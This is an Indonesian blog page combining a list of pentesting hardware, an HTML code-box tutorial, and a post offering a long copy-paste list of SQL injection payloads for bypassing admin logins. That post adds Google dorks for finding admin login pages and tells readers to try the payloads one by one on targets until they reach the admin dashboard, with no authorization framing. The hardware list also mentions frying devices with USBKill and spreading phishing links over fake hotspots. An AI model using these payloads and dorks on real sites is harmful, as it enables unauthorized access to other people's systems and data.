[Top] Hardware untuk aktifitas Pentesting toolkit

[Top] Hardware untuk aktifitas Pentesting toolkit

Untuk aktifitas Pentesting terkadang seorang pentester tidak hanya berhubungan dengan software saja, namun terkadang mereka butuh Hardware untuk menunjang aktifitas ya sepeti network hacking dll. Berikut toolkit hardware yg biasa di gunakan pentester.

1. USBKill adalah sebuah hardware USB yg terlihat seperti USB Drive biasa atau flashdisk biasa namun berfungsi untuk mematikan perangkat yg telah di hubungkan menggunakan USBKill ini, perangkat yang baru di pisang seperti laptop, PC , bahkan handphone, dapat mati atau rusak setelah di pasang USBKill ini.

2. Wi-Fi pineapple adalah sebuah perangkat keras untuk Pentesting wireless network, atau bisa digunakan untuk clone WiFi hotspot, membuat hotspot palsu (MITM), dan menyebarkan link phising dalam hotspot palsu yg di buat dengan perangkat Wi-Fi ini, Wi-Fi pineapple ini juga cocok digunakan untuk bruteforce WiFi dll.

3.UberTooth One adalah alat yang sangat bagus untuk pentset Bluetooth. Kalian dapat menggunakannya dalam frekuensi 2,4 GHz dan untuk memantau lalu lintas Bluetooth dengan Kali Linux. Kalian dapat menggunakannya dengan Kali Linux untuk menangkap lalu lintas Wi-Fi. Lalu lintas yang ditangkap dapat diperiksa untuk konten sensitif menggunakan perangkat lunak seperti Wireshark di Kali Linux.

4. Adaptor Wi-Fi USB Alfa AWUS036NHA adalah salah satu alat utama untuk menyerang jaringan nirkabel menggunakan Kali Linux. Alat Ini didukung oleh sejumlah besar kernel Kali Linux dan menggunakan chipset Atheros yang memungkinkan Anda untuk beroperasi dalam keenam mode Wi-Fi. Adaptor ini sebagian besar lebih disukai karena kemampuan injeksi paketnya dan bekerja dengan baik dengan sebagian besar versi Kali Linux.

6. LAN Turtle, USB lan ini dapat digunakan di Kali Linux. Perngkat ini dapat dihubungkan ke LAN dan dikelola dari jarak jauh. Perangkat ini juga dapat digunakan untuk intercept lalu lintas masuk ke komputer target. Kalian harus menghubungkannya ke port USB yang ada di komputer target dan menghubungkan kabel LAN tersebut.

7. HackRF One adalah perangkat SDR yang dapat mengirim atau menerima sinyal radio dari 1MHz hingga 6GHz. Perangkat ini kompatibel dengan Kali Linux. Untuk menggunakannya, kalian memerlukan antena karena antena di perangkat ini tidak disediakan secara default. Antena starter terbaik yang bisa kalian gunakan adalah ANT500.

Itu tadi lah di atas adalah beberapa dari toolkit hardware yang banyak di gunakan oleh para pentester untuk menunjak kinerja Pentesting mereka selain menggunakan software yg mereka miliki di dalam komputer atau device mereka.

Kumpulan Payload, Dork, Dan Tutorial Bypass Admin Login

 Kali ini saya akan membuat artikel tentang cara bypass admin login dengan metode yang sebenarnya sama dengan injection yaitu menginputkan karakter ke dalam form username dan password tanpa harus mengetahui user dan pass yang sebenarnya dengan karakter SQL atau seperti karakter '1=1' atau dengan payload lain nya, dibawah ini saya juga telah menyertakan kumpulan payload yang bisa di gunakan untuk bypass sehingga kalian dapat langsung copas saja. 

Payload Bypass Admin.

'-'

' '

'&'

'^'

'*'

' or ''-'

' or '' '

' or ''&'

' or ''^'

' or ''*'

"-"

" "

"&"

"^"

"*"

'=''or'

" or ""-"

" or "" "

" or ""&"

" or ""^"

" or ""*"

or true--

" or true--

' or true--

") or true--

') or true--

' or 'x'='x

') or ('x')=('x

')) or (('x'))=(('x

" or "x"="x

") or ("x")=("x

")) or (("x"))=(("x

' or 1=1 limit 1 -- -+

or 1=1

or 1=1--

or 1=1#

or 1=1/*

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

admin'or 1=1 or ''='

admin' or 1=1

admin' or 1=1--

admin' or 1=1#

admin' or 1=1/*

admin') or ('1'='1

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/*

admin') or '1'='1

admin') or '1'='1'--

admin') or '1'='1'#

admin') or '1'='1'/*

Silahkan copas payload diatas jika ingin mencoba bypass admin login, coba satu persatu hingga Anda berhasil, masuk sebagai administrator.

Dork Google:

inurl:/admin.php

inurl:/admin/login.php

Tutorial Bypass Admin:

1. Jika sudah mendapat target Kalian langsung masukkan payload yang ada di atas hingga berhasil masuk ke dalam halaman dashboard admin. Lihat gambar di bawah.

2. Terlihat setelah kita memasukkan salah satu payload yang ada di atas maka kita telah masuk ke dalam halaman Dashboard admin.

Selesai sepertinya kita sampai di sini saja, dan lain kali saya akan buat artikel baru terus kunjungi blog saya untuk mendapat artikel dan ebook baru dan gratis

Membuat Kotak Untuk Script/Code Pada Artikel

 Pada kesempatan kali ini saya akan share sedikit ilmu yang mungkin bisa menjadi bermanfaat bagi saya sendiri dan beberapa teman-teman lainnya, yaitu syntax code html untuk membuat sebuah box atau kota yang dapat berfungsi untuk menampilkan isi artikel sebuah script atau code apapun di dalam artikel bahkan bisa di gunakan untuk menulis code html, PHP, atau bahasa pemrograman lainnya tanpa khawatir code tersebut tereksekusi di dalam artikel, sehingga dapat dibaca di dalam artikel yang kita buat. Langsung kita coba dengan contoh di bawah.

Sebagai contoh saya ingin menampilkan atau membuat sebuah isi artikel dengan menyisipkan code html.

<div style="background-color: #f3f3f3; border-left: 10px solid rgb(34, 136, 221); padding: 10px; t-align: left;">

Code di atas tidak tereksekusi karena kita menggunakan code html yang di sisipkan di dalam kotak tersebut.

Jadi contoh di atas saya kira sudah dapat di pahami dengan mudah, dan code tersebut juga bisa Anda copas langsung kedalam script html sobat saat membuat artikel.

Sekian tutorial hari ini yah jangan lupa datang kembali lagi untuk informasi yang lain.